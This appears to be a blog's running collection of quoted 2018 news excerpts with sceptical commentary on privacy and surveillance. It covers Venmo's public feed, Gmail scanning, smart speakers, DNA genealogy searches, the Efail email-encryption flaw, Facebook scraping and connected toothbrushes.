By default, users of the Venmo payment service allow Venmo to mine their transaction data and share everything except the payment amounts. Venmo has chosen to exercise this liberty by providing a Web interface though which anyone with Internet access can download the transaction data — no authentication necessary!
It turns out that some people use the text fields in which one can document the reason for the payment and send a comment to the recipient as opportunities for other modes of discourse.
“A Privacy Researcher Uncovered a Year's Worth of Breakups and Drug Deals Using Venmo's Public Data”
Samantha Cole, Motherboard, July 17, 2018
Payment exchanges accumulate in a public feed, where people thought it was hysterical to write things like “money for drugs” or “sexual favors” for otherwise-innocuous payments. …
It's not so much the exposure of the intimate details of your life, … but that each transaction is just one data point in a massive web of knowledge companies like Venmo are building about us. And once they know who we're closely connected to, what we buy, and when, that's an immensely valuable dataset for companies to use in targeting your future decisions.
“Tech's ‘Dirty Secret’: App Developers Sift Through Your Gmail”
Douglas MacMillan, Stocks Newsfeed, July 2, 2018
But the Internet giant continues to let hundreds of outside software developers scan the inboxes of millions of Gmail users who signed up for email-based services offering shopping price comparisons, automated travel-itinerary planners or other tools. Google does little to police those developers, who train the computers — and, in some cases, employees — to read their users' emails …
Letting employees read user emails has become “common practice” for companies that collect this type of data, says Thede Loder, the former chief technology officer at eDataSource Inc. … He says engineers at eDataSource occasionally reviewed emails when building and improving software algorithms.
“Some people might consider that to be a dirty secret,” says Mr. Loder. “It's kind of reality.”
“Deceived by Design: How Tech Companies Use Dark Patterns to Discourage Us from Exercising Our Rights to Privacy”
Forbrukerrådet, June 27, 2018
“Alexa, When's My Next Class? This University Is Giving Out Amazon Echo Dots”
Elizabeth Weise, USA Today, June 20, 2018
Not to mention the problem of Alexa “simply overhearing” otherwise private information spoken aloud by anyone within microphone range …
Starting this fall, some students at Northeastern University in Boston will be given the option of getting an Echo Dot smart speaker linked to their university accounts. They'll be able to ask Amazon's Alexa what time their classes are, how much money's left on their food card and even how much they own the bursar's office.
The program gives students instant access to information they would have to call or go online for, as well as taking pressure off the school's offices. It also makes Amazon's digital assistant a go-to source for a generation who will inhabit a world in which talking to computers is commonplace and who will soon have paychecks to spend.
At the same time, it raises questions about security and privacy for young adults living in close quarters, often on their own for the first time. …
Alexa can't differentiate between different people's voices, so a prying roommate could be an issue, said Paul Bischoff, a privacy advocate with Comparitech.com, a security and privacy review site.
“There's also the problem of third parties simply overhearing otherwise private information spoken aloud by Alexa,” he said.
“Golden State Killer Suspect Arrest Opens Floodgates for Law Enforcement Use of DNA Websites”
Steve Horn, Criminal Legal News, May 31, 2018
The use of DNA-based genealogy websites to track down the “Golden State Killer” suspect, Joseph DeAngelo, appears to have inspired police departments nationwide. It's a move that has irked privacy advocates and criminal justice system reformers. …
Most criminal law experts say those who hand over their DNA to websites like GEDmatch have no expectation of privacy under the Fourth Amendment. … Whether that same legal logic applies to their extended relatives, though, will remain an open question as the Golden State Killer's case weaves its way through the courts.
“Why the Golden State Killer Investigation Is Cause for Concern”
Vera Eidelman, Free Future, American Civil Liberties Union, May 11, 2018
We should be able to access the benefits of technological advances without giving up our rights.
Coming next year: Amazon applies machine learning to DNA databases to infer users' purchasing preferences and tendency to comparison-shop, enabling differential pricing for persons whose relatives' genetic constitution shows that they are indifferent to overpaying.
Some security researchers have discovered a new attack on PGP. They have written a paper explaining how it works and plan to publish it tomorrow, but the Electronic Frontier Foundation has learned enough about it that they are sounding an alarm even before the details are public:
“Attention PGP Users: New Vulnerabilities Require You to Take Action Now”
Danny O'Brien and Gennie Gebhart, Deeplinks, Electronic Frontier Foundation, May 13, 2018
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with this research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages. …
Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
The story includes links to instructions provided by the EFF on how to temporarily disable the PGP plug-ins for Thunderbird, Apple Mail, and Outlook.Update (2018-05-14⊺11:34:32-05:00)
The discoverers of the attack now have a Web site up and have published a draft of their paper there:
“Efail: Breaking S/MIME and OpenPGP Email Encryption Using Exfiltration Channels”
Damian Poddebniak, Christian Dresen, Jens Miller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk, May 14, 2018
There are actually two vulnerabilities. One exploits peculiarities, arguably errors, in mail user agents that parse and interpret HTML in messages after they have been decrypted. The other exploits a weakness in the OpenPGP standard: Under certain circumstances, the standard doesn't require integrity checks and doesn't specify what a decryption algorithm should do when an integrity check fails. Consequently, many mail user agents do the wrong thing when they receive a message that has been tampered with.
The Electronic Frontier Foundation has a follow-up, and other security authorities are providing quick analysis as well:
“Not So Pretty: What You Need to Know about E-Fail and the PGP Flaw”
Erica Portnoy, Danny O'Brien, and Nate Cardozo, Deeplinks, Electronic Frontier Foundation, May 14, 2018
“Some Notes on eFail”
Robert Graham, Errata Security, May 14, 2018
“New Vulnerabilities in Many PGP and S/MIME Enabled Email Clients”
Matthew Green, Twitter, May 14, 2018
Dental-insurance companies are big fans of network-connected toothbrushes and will send them out as freebies — repeatedly and insistently.
“Our Dental Insurance Sent Us ‘Free’ Internet-Connected Toothbrushes. And This Is What Happened Next”
Wolf Richter, Wolf Street, April 14, 2018
The authors' family eventually figured out that you can use the toothbrush and even switch on the electricity so that the brush head vibrates automatically without activating the network connection, if you're careful to switch off Bluetooth in your phone before brushing your teeth. Now, however, they worry about the next step in the process:
We're expecting a series of emails that start out gently, and every two weeks or so get increasingly emphatic, telling us that we better start setting up the Internet connection to our toothbrushes and start sending our data to the cloud.
What's next? The day when we cannot get dental insurance without internet-connected toothbrushes. …
For now, our household is still able to at least partially block this intrusion. But there will be a day when we will be forced to surrender our data to get health insurance, drive a car, or have a refrigerator and a thermostat in the house. This is where this is going. Why? Because data is where the money is. And because many consumers are embracing it.
One down side to the emergence of user control of data collection and access as a political meme and substitute for reasoned argument is the likely countermove from the surveillance industry: conflating the user's right to privacy with the corporation's responsibility for confidentiality. Surveillance is unethical and irresponsible even when the corporation carefully manages third-party access to the dossiers it compiles.
“When the Business Model Is the Privacy Violation”
Arvind Narayanan, Freedom to Tinker, April 12, 2018
In other situations, the intended use is the privacy violation. The most prominent example is the tracking of our online and offline habits for targeted advertising. This business model is exactly what people object to, for a litany of reasons: targeting is creepy, manipulative, discriminatory, and reinforces harmful stereotypes. The data collection that enables targeted advertising involves an opaque infrastructure to which it's impossible to give meaningfully informed consent. …
In response to privacy laws, companies have tried to find technical measures that obfuscate the data but allow them [to] carry on with the surveillance business as usual. But that's just privacy theater. Technical steps that don't affect the business model are of limited effectiveness, because the business model is fundamentally at odds with privacy; this is in fact a zero-sum game. …
Privacy advocates should recognize that framing a concern about data use practices as a privacy problem is a double-edged sword. Privacy can be a convenient label for a set of related concerns, but it gives industry a way to deflect attention from deeper ethical questions by interpreting privacy narrowly as confidentiality.
And here we have it:
While Zuckerberg claimed that major transparency efforts are on the company's horizon, he seemed dismissive of users' concerns about their privacy. The recent movement to #DeleteFacebook, he said, had “no meaningful impact” on the company or Facebook usage.
“Facebook knows so much about you,” he added, “because you chose to share it with your friends and put it on your profile.”
“Mark Zuckerberg: ‘It Was My Mistake’ Facebook Compromised Data of 87 Million Users”
Sarah Emerson, Motherboard, April 4, 2018
Facebook's actions and policy changes are about tightening up their control over access to the dossiers that Facebook compiles, which are now the company's intellectual property and primary business asset. Facebook has zero interest in their users' so-called “concerns about their privacy” and is not impressed by the feeble attempts of a few rabble-rousers to impede the juggernaut.
Just to drive home the point, Facebook's Chief Technology Officer recently conceded in the company blog that “malicious actors” have acquired “most” Facebook users' profile information. (Naturally, he buries the lede in the seventh paragraph of the post.)
“An Update on Our Plans to Restrict Data Access on Facebook”
Mike Schroepfer, Facebook Newsroom, April 4, 2018
Until today, people could enter another person's phone number or email address into Facebook search to help find them. … However, malicious actors have also abused these features to scrape public profile information by submitting phone numbers or email addresses they already have through search and account recovery. Given the scale and sophistication of the activity we've seen, we believe most people on Facebook could have had their public profile scraped in this way.
Now that Siri, Alexa, Cortana, and their friends are pretty well established as commonplace services in homes, apartments, and hotel rooms, and people have demonstrated their willingness to accept and rely on devices with always-on microphones and cameras, the companies that make them are sneaking more weasel words into their nominal commitments to user privacy.
The peg for this story is the reporter's discovery of patent applications, filed by Amazon and Google, for using the data generated by continuous monitoring of the always-on mikes to target advertising more accurately, to determine people's moods, to infer their state of health, to find out whether a child is up to some minor mischief (and generate an appropriate reprimand), and so on. As the reporter points out, companies often generate patent applications like these regardless of whether they have any intention of using the technology (and, indeed, regardless of whether the technology would actually work). On the other hand, such documents reveal how the big surveillance capitalism companies are thinking about the future of their products and express in a more genuine and sincere way the companies' attitudes towards the privacy of their users.
“Hey, Alexa, What Can You Hear? And What Will You Do with It?”
Sapna Maheshwari, The New York Times, March 31, 2018
An Oxford lecturer in international development prescribes what needs to be done in order to restore privacy to Internet users.
“‘Cambridge Analytica’: Surveillance Is the DNA of the Platform Economy”
Ivan Manokha, Open Democracy, March 23, 2018
The current social mobilization against Facebook resembles the actions of activists who, in opposition to neoliberal globalization, smash a McDonald's window during a demonstration.
What we need is a total redefinition of the right to privacy (which was codified as a universal human right in 1948, long before the Internet), to guarantee its respect, both offline and online.
What we need is a body of international law that will provide regulations and oversight for the collection and use of data.
What is required is an explicit and concise formulation of terms and conditions which, in a few sentences, will specify how users' data will be used.
It is important to seize the opportunity presented by the Cambridge Analytica scandal to push for these more fundamental changes.
But the Cambridge Analytica scandal provides no such opportunity. The Snowden revelations (2013) were the last, best opportunity, and at that time we looked at the facts and decided not to do anything about them. The current reaction to Cambridge Analytica is just some extremely faint and transient buyer's remorse, amplified by a few politicians who assumed for years that their opponents didn't understand technology well enough to turn it to their advantage.
A research team at Boston University has discovered a technique for partially encrypting messages so as to make decryption extremely expensive, but not impossible. They call their partial-encryption system “cryptographic crumpling.” The computation required to decrypt a message prepared by this technique is useless in the decryption of any other message, so there are no economies of scale — the decryptor must pay the high computational price all over again for each new message.
The researchers offer their system as a way of resolving the “second crypto wars” between government officials, who insist that the makers of all commercial-grade encryption software must provide back doors for law-enforcement and national-security agencies, and privacy advocates, who insist that only strong, end-to-end encryption will protect their rights. The researchers argue that their system would allow well-funded government agencies to access the partially encrypted data in exceptional cases, but would force those agencies to choose their targets so carefully that the privacy rights of ordinary users would not be significantly affected.
But this proposal doesn't really accommodate either side. Government officials say they need to decrypt messages that could contain evidence of crime or terrorism regardless of how many such messages there are, and so would not be content with a system in which their budget constrains their ability to decrypt. And privacy advocates would surely note that if government officials with legitimate interests in the contents of communications were able to perform the decryptions, so too would corporations bent on industrial espionage, hostile foreign governments, and even well-funded hacking teams. A back door works equally well for everyone who has the resources to open it.
Such failed attempts at compromise reinforce the conclusion (which most security analysts reached long ago) that the requirements of government officials and privacy advocates are incompatible.
“Cryptographic Crumpling: The Encryption ‘Middle Ground’ for Government Surveillance”
Charlie Osborne, Zero Day, March 19, 2018
Now, in preparation for the European Union's General Data Protection Regulation, PayPal has published the list of these third party service providers and, er, other business partners.
“List of Third Parties (Other Than PayPal Customers) with Whom Personal Information May Be Shared”
PayPal, January 1, 2018
Dare you to read to the end.
As a proponent and practitioner of technological skepticism, the practice of assessing technological innovations and judging whether they will make me any wiser, better, happier, or more helpful to others before deciding whether or not to adopt them, I'm gratified to see other people thinking along the same lines and trying to organize the outraged victims of thoughtlessly misdesigned technology.
“There Are No Guardrails on Our Privacy Dystopia”
David Golumbia and Chris Gilliard, Motherboard, March 9, 2018
Tech companies … have demonstrated that they are neither capable nor responsible enough to imagine what harms their technologies may do. If there is any hope for building digital technology that does not include an open door to wolves, recent experience has demonstrated that this must include robust engagement from the non-technical — expert and amateur alike — not just in response to the effects of technologies, but to the proposed functions of those technologies in the first place.
“What If Designers Took a Hippocratic Oath?”
Sanjena Sathian, Point Taken, PBS, January 1, 2016
What are we really looking at? A next-generation consumer advocacy battle, one in which a victory depends not on class action lawsuits or government oversight but on popular awareness and education.
An essay by a public intellectual reflecting on the value of privacy and pointing out that many people prefer it to constant social interaction. This retrospective view, bordering on denialism, is surely one of the last expressions of the values that prevailed in the era before total and inevitable surveillance.
“Luxuriating in Privacy”
Sarah Perry, ribbonfarm, March 1, 2018
Privacy is wonderful in and of itself, and privacy keeps the peace.
Yes. And its disappearance is a reflection of the prevalence of total war.
“The House That Spied on Me”
Kashmir Hill and Surya Mattu, Gizmodo, February 9, 2018
Getting a smart home means that everyone who lives or comes inside it is part of your personal panopticon, something which may not be obvious to them because they don't expect everyday objects to have spying abilities. One of the gadgets — the Eight Sleep Tracker — seemed aware of this, and as a privacy-protective gesture, required the email address of the person I sleep with to request his permission to show me sleep reports from his side of the bed. But it's weird to tell a gadget who you are having sex with as a way to protect privacy, especially when that gadget is monitoring the noise levels in your bedroom. …
I was looking forward to the end of the experiment and getting rid of all the Internet-connected devices I'd accumulated, as well as freeing up the many electrical outlets they'd been hogging. …
But the truth is that my house will remain smart, just like yours may be. Almost every TV on the market now is connected — because otherwise how do you Netflix and chill? — and over 25 million smart speakers were sold last year alone, with Apple soon to release its version, the HomePod, meaning a good percentage of American homes have or will have an internet-connected assistant waiting patiently for someone in the house to say their wake word. …
We may already be past the point of no return: internet functionality is a necessary component for the operation of many devices in our home, and it increasingly gets added on as a feature even when it's not strictly necessary. … Once the data is going over the wires, companies can't seem to resist peeking at it, no matter how sensitive it is.